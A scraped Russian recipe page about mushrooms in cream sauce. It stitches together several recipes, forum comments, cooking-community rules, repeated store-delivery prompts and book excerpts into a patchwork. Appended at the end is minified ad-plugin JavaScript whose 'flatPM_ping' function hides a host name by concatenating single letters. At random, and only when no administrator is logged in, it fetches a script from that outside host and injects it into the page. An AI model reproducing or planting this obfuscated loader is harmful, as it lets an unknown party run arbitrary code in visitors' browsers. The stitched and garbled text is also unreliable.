Грибы в сливках

Сливочный соус с грибами – 6 домашних вкусных рецептов приготовления

Сливочный соус с грибами – неустаревающая классика, одно из наиболее удачных блюд французской кухни, и не только. Готовить его истинное удовольствие, потому что делается это быстро и просто. А кто не мечтает поставить на стол нечто изысканное, но потратить на это минимум энергии и времени? Читай дальше…

  1. Главная
  2. Каталог
  3. Лучшие подборки
  4. Соусы
  5. Сливочный соус
  6. Сливочный соус с грибами

Сливочный соус с грибами: способы приготовления и советы

Существует несколько типов сливочного соуса с грибами.

Один из них представляет собой подливку к мясному, овощному ассорти, к макаронам. Все ингредиенты измельчены блендером до состояния пюре.

Второй – соус с более крупной текстурой. Для него грибы нарезаются кусочками, крупными или мелкими. В любом случае, они чувствуются в подливке.

Третий – блюдо, для которого грибы (чаще всего шампиньоны) режут пластинками. Или вовсе оставляют целиком, хотя для этого лучше взять молодые, мелкие грибочки.

Пять самых часто используемых ингредиентов в рецептах сливочного соуса с грибами:

Продукт Калорий ккал в 100г Белки г в 100г Жиры г в 100г Углеводы г в 100г
Сливочное масло 734 0.5 82.5 0.8
Сливки 300 2.8 20 3.6
Шампиньоны 24 4.2 1 0.1
Мука 325 12 1 67
Перец 26 1.3 7.2

Все три типа соусов могут отличаться густотой, составом продуктов, способами приготовления. Некоторые можно запекать в духовке. Другие тушат или варят на плите.

Также все три типа идеально подходят для пасты, любых видов макаронных изделий. Для запеканок и рагу. Для лазаньи и рулетов.

Они представляют собой неплохую начинку для пирогов, особенно открытого типа.
Идеально сочетаются с разными колбасами, ветчиной, курицей, рыбой (особенно красной).

При минимуме усилий грибной сливочный соус легко превращается в паштет или намазку для праздничных бутербродов. Для загущивания в него просто добавляют поджаренную муку (ее можно заменить вареной кукурузной крупой).

Пять самых быстрых рецептов сливочный соус с грибами:

Название блюда Время приготовления Калорий ккал в 100г Рейтинг пользователей
Сливочный соус с грибами для спагетти 25 мин 228 +39
Сливочный соус с грибами к мясному блюду 35 мин 129 +25
Сливочный соус с грибами и ветчиной 35 мин 243 +29
Сливочный соус с грибами в мультиварке 35 мин 105 +15
Соус сливочный из свежих белых грибов 1 ч 308 +47

Имеется так много рецептов сливочного соуса с грибами, что все не переготовишь и за год.

Грибы в сливках – очень вкусный рецепт жареных грибочков

Вкусные жареные грибочки в сливках. Классный рецепт на ужин или обед. Готовится очень просто и быстро, а само блюдо получается изумительно вкусным.

Белые грибы (или шампиньоны) – 300 гр

Сливки 10% – 200 мл

Чеснок – 1 зубчик

Черный перец – 5 горошин

Душистый перец – 2-3 горошины

Лавровый лист – 1 шт.

Сливочное масло – 1 ст.л.

Растительное масло – 2 ст.л.

1. Мелким кубиком порезать лук. Измельчить чеснок.

2. Грибы нарезать кубиками или вдоль.

3. Обжарить лук до золотистости на смеси сливочного и растительного масел, снять его со сковороды.

4. Обжарить грибы на смеси сливочного и растительного масел до румяности. Добавить сливки, черный и душистый перец, протушить минут 15-20.

5. Добавить чеснок, обжаренный лук, лавровый лист, посолить по вкусу, протушить еще минуты 3.

6. Спасибо большое за внимание. Весь рецепт можно посмотреть в видео.

Найдены возможные дубликаты

никогда не понимала зачем класть горошек целиком,попадая на зуб он просто адское чувство вызывает)) Почему нельзя помолоть?

я вообще на али покупаю пакетики для чая и их же использую для всяких таких приправ, чтобы потом из готового блюда их вытащить.

Плюсик, зашла это написать после просмотра фотографии. Спасибо @myrrh , !

если его дольше выпаривать, он тоже погуще будет.

Всегда хотел спросить. А зачем вы лук режете параллельно столу? Я может чего не понимаю?

Если резать только перпендикулярно, то крайние кусочки получаются очень длинными, не кубиком, поэтому я сначала разрезаю вдоль параллельно столу, это моя привычка такая, если нужно мелким кубиком.

На такое блюдо лук, мне кажется, лучше резать перьями. Красивее будет выглядеть..

теги еда, рецепты

Сварила гречу,не знала с чем есть. Спасибо за рецепт,пошла готовить

Реально очень вкусно, не прогадала)

А грибы где взяла?

Я себе всегда беру шампиньоны свежие,нарезаю их и оставляю в морозилке, так что взяла из морозилки)

Сегодня уже поела,было безумно вкусно 😋

я никогда не делала с сухими.

@artcrash999 , добавьте уже в правила сообщества запрет на использование оценочных высказываний и слов в превосходной степени в заголовках постов.
“Очень вкусно”, “Самый лучший рецепт” и всё в таком духе. Чесс слово, задолбали. Вкусы у людей разные, что для одного очень вкусно, то для другого может быть отвратительная дрянь.
Пусть на своих ютуб каналах, которые они тут активно пиарят, пишут что угодно. Но не здесь.

Ребят это игра слов. Мы не конституцию сообщества создаём, есть правила которые регулируют конфликтные ситуации. А все остальное это уже юридическая трактовка в той или иной степени) Для каждой мамы свой ребёнок будет самым любимым и красивым, так же авторы относятся к своим кулинарным шедеврам. В конце концов для этого и есть «+ и -». Не нравится или не согласен минусуй. Личное дело каждого.

Модераторы давно уже тегами не занимаются.

О сообществе

Открытое сообщество, посвященное кулинарному творчеству. В сообществе будут выкладываться рецепты блюд, длиннопосты с фоторецептами, видео рецепты, вкусовые сочетания продуктов, работы и советы от шеф поваров, статьи о продуктах, блюдах и их происхождении, кулинарные приемы для повседневной жизни от сложных до простых, кулинарный юмор.

Если у вас есть вопросы по выбору посуды, сервировке, проверке качества продуктов, вкусовых совместимостях и др. тематические, можете смело оставлять их в сообществе.

1) Запрещается оставлять сообщения, носящие рекламный (в любой степени) характер и не связанные с брендом.

2) Запрещается размещать сообщения о продаже и перепродаже любых товаров и услуг; размещать ссылки на интернет-ресурсы и/или файлы, содержащие в себе информацию рекламного характера, не связанную с брендом.

3) Запрещается создавать темы и сообщения, провоцирующие пользователей на нарушения настоящих Правил.

4) Запрещается прямое или косвенное оскорбление участников сообщества и администрации.

5) Запрещается выкладывать фото/видео материалы приготовления блюд со сторонних ресурсов. Чтобы исключить плагиат в конце поста прикрепляем фото с готовым блюдом и на листочке имя вашего аккаунта с пометкой для Кулинарной Мастерской или КМ. Посты игнорирующие это правило будут перенесены в общую ленту.

6) Пост видео без подробного текстового рецепта будет перемещён в общую ленту.

7) При оформлении юмористического контента необходимо указывать хештег Кулинарный юмор .

8) Для внесения предложений, критики и других вопросов, писать с пометкой @admoders .

Грибы в сливках

У вас 0 товаров
в 0 магазинах

Грибы в сливочном соусе

Грибы в сливочном соусе станут прекрасным дополнением к картофелю и макаронам. Именно сливки, которые мы будем использовать для приготовления этого соуса, смягчат вкус и запах грибов. Прекрасное сочетание двух этих ингредиентов считается классикой в

Приготовление

1. Грибы промойте и мелко нарежьте.
2. Растопите сливочное масло на сковороде и обжарьте мелко нарезанный лук.
3. Теперь добавьте шампиньоны и жарьте, периодически помешивая 5 минут.
4. Влейте сливки и воду, перемешайте и накройте крышкой. Уменьшите жар до минимума и продолжайте готовить еще 5 минут.
5. На другой сковороде поджарьте просеянную муку до золотистого цвета, только не передержите.
6. Добавьте подсушенную муку к остальным ингредиентам, следом поперчите и положите лавровый лист.
7. Сверху посыпаем тертым мускатным орехом, накрываем крышкой и тушим еще 4 минуты.
Грибы в сливочном соусе готовы! Приятного аппетита!

Комментарии (1)

Блюда с грибами (11)

Новые статьи в нашем блоге (109)

Войти на сайт

Если Вы зарегистрированы и впервые на обновленном сайте, пройдите процедуру восстановления пароля.

Регистрация

Присоединяйся к команде Valio и получи возможность заказать продукты Valio из любимых магазинов!

Согласие с условиями обязательно для использования этой формы.

Минимальная сумма для доставки 1000 рублей . Необходимо добавить товаров на сумму 230 рублей здесь или позже на сайте партнера.
Условия доставки

Сервис заказа продукции Valio из любимых магазинов с доставкой на дом

Выберите ближайший магазин доставки, чтобы легко и удобно заказать продукцию Valio. Продукция продаётся по актуальным ценам торговых точек.
Карта доставки

Выберите ближайший магазин доставки, чтобы легко и удобно заказать продукцию Valio. Продукция продаётся по актуальным ценам торговых точек.

Выберите ближайший магазин доставки, чтобы легко и удобно заказать продукцию Valio. Продукция продаётся по актуальным ценам торговых точек.

Выберите ближайший магазин доставки, чтобы легко и удобно заказать продукцию Valio. Продукция продаётся по актуальным ценам торговых точек.

Выберите ближайший магазин доставки, чтобы легко и удобно заказать продукцию Valio. Продукция продаётся по актуальным ценам торговых точек.

Грибы, тушеные в сливках

Грибы, тушеные в сливках

Состав: 500 г грибов, 1 стакан сливок, 1 ст. л. масла, соль, зелень петрушки или укропа, корица, гвоздика, перец, лавровый лист.

Свежие грибы очистить, промыть и ошпарить, нарезать дольками, посолить и слегка обжарить. После этого сложить их в кастрюлю и залить сливками. Веточки петрушки и укропа связать, вложив в середину пучка корицу, гвоздику, перец, лавровый лист (сделать так называемый «букет гарни»), и положить в кастрюлю, в грибы. Грибы посолить, накрыть крышкой и поставить в умеренно горячую духовку на 1 час. Когда грибы будут готовы, связанную зелень вынуть, а грибы подать в той же посуде, в которой они тушились.

Данный текст является ознакомительным фрагментом.

Читать книгу целиком

Похожие главы из других книг

Грибы, тушенные в сливках

Грибы, тушенные в сливках Свежие грибы (белые, подберезовики, подосиновики) очистить, промыть и ошпарить, а затем нарезать дольками, посолить и слегка обжарить. После этого сложить их в горшок или кастрюлю и залить кипячеными сливками.Зелень петрушки и укропа связать,

Грибы, тушенные в сливках

Грибы, тушенные в сливках Очищенные, промытые и ошпаренные грибы нарезать дольками, посолить и слегка обжарить, затем сложить в кастрюлю и залить кипячеными сливками, связать вместе в пучок зелень укропа и петрушки, в середину его выложить корицу, гвоздику, лавровый лист,

Грибы тушеные

Грибы тушеные На 1 кг подготовленных грибов нужно взять: масла подсолнечного или сливочного -350 г, лука — 100 г, перца горького и душистого — по 10 шт., лаврового листа — 3 шт., соли поваренной — 0,5 ст. ложки.Тушат белые грибы, подберезовики, подосиновики, опенки, маслята,

Грибы, тушенные в сливках

Грибы, тушенные в сливках Состав: грибы — 500 г, сливы — 1 стакан, масло для обжаривания — 1 ст. ложка, зелень, корица, гвоздика — 2–3 шт., перец — 3–4 горошка, лавровый лист, соль.Свежие грибы (белые, подберезовики, подосиновики) очистить, промыть, ошпарить, нарезать ломтиками,

Тушеные грибы

Тушеные грибы Маслята тушеные Ингредиенты:600 г грибов, 1 луковица, 3 ст. л. сливочного масла, 1 ст. л. муки, 2 ст. л. сметаны, соль, перец, зелень укропа и петрушки.Способ приготовления:Грибы тщательно промыть, снять со шляпки верхнюю кожицу, мелко нарезать.Нашинкованный мелко

Цыплята, тушеные в сливках

Цыплята, тушеные в сливках 2 цыпленка весом по 300 г600 г припущенного риса2 стакана сливок60 г животного жира сольДля теста:1 стакан муки90 мл водыОбработанную тушку цыпленка порубите на порционные куски, посыпьте солью, обжарьте на хорошо прогретой сковороде и уложите в

Боровики, тушеные в сливках

Боровики, тушеные в сливках КомпонентыГрибы свежие – 500 г Сливки – 1 стакан Масло сливочное – 2 столовые ложки Измельченная зелень петрушки и укропа – по 1 столовой ложке Лавровый лист – 1 шт. Душистый перец – 4–5 горошин Соль – по вкусуСпособ приготовленияГрибы очистить

Кабачки, тушеные в сливках

Кабачки, тушеные в сливках КомпонентыКабачок средний – 1 штука Морковь – 1 штука Яблоко – 1 штука Мука пшеничная – 1 столовая ложка Сливки – 1/2 стакана Соль – по вкусуСпособ приготовленияКабачок, морковь и яблоко почистить и натереть на крупной терке.Полученную смесь

Шампиньоны, тушеные в сливках

Шампиньоны, тушеные в сливках КомпонентыГрибы – 400 г Чеснок – 1 зубчик Паста томатная – 1 столовая ложка Масло сливочное – 2 столовые ложки Вода – 2 столовые ложки Мука – 2 столовые ложки Сливки – 1 стаканСпособ приготовленияЧеснок почистить и очень мелко нарубить.Грибы

Боровики, тушеные в сливках

Боровики, тушеные в сливках КомпонентыБелые грибы свежие – 500 г Сливки – 1–1,5 стакана Масло сливочное – 1 столовая ложка Измельченная зелень петрушки и укропа – по 1 столовой ложке Соль – по вкусуСпособ приготовленияГрибы очистить от земли, промыть, ошпарить кипятком,

Грибы, тушенные в сливках

Грибы, тушенные в сливках КомпонентыГрибы свежие – 500 г Лук репчатый – 1–2 шт. Морковь – 1 шт. Сливки – 1,5 2 стакана Масло сливочное – 2–3 столовые ложки Рубленая зелень петрушки и укропа – по 1–2 столовой ложке Лавровый лист – 1 шт. Душистый перец – 4–5 горошин Соль – по

Грибы, тушенные в сливках

Грибы, тушенные в сливках ? ингредиенты500 г свежих грибов, 250 мл нежирных сливок, 1 ст. ложка кукурузного масла, соль, перец, специи.? способ приготовления1. Грибы очистить, промыть и ошпарить кипятком. Затем нарезать их дольками, посолить и слегка спассеровать. После этого

Тушеные в сливках овощи

Тушеные в сливках овощи 8 картофелин, 2 помидора, 1 кабачок, 1 зубчик чеснока, 0,3 вилка белокочанной капусты, 200 мл сливок, 2 столовые ложки растительного масла, соль.Вымойте и очистите овощи. Нашинкуйте капусту. Картофель и кабачок нарежьте средними кубиками. Чеснок мелко

Тушеные грибы

Тушеные грибы Что понадобится: 400 г сушеных грибов, 3 луковицы, 1 ст. л. муки, ? стакана грибного бульона, 3–4 ст. л. растительного масла, соль Сушеные грибы промыть, замочить в воде на 3 ч. Затем отварить в той же воде, добавив соль, до готовности. Откинуть на дуршлаг,

Грибы, тушеные в сливках

Грибы, тушеные в сливках Состав: 500 г грибов, 1 стакан сливок, 1 ст. л. масла, соль, зелень петрушки или укропа, корица, гвоздика, перец, лавровый лист.Свежие грибы очистить, промыть и ошпарить, нарезать дольками, посолить и слегка обжарить. После этого сложить их в кастрюлю и

Грибы, тушеные в сливках

Грибы, тушеные в сливках Состав: 500 г грибов, 1 стакан сливок, 1 ст. л. растительного масла, соль, зелень петрушки или укропа, корица, гвоздика, перец, лавровый лист.Свежие грибы очистить, промыть и ошпарить, нарезать дольками, посолить и слегка обжарить. После этого сложить их

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};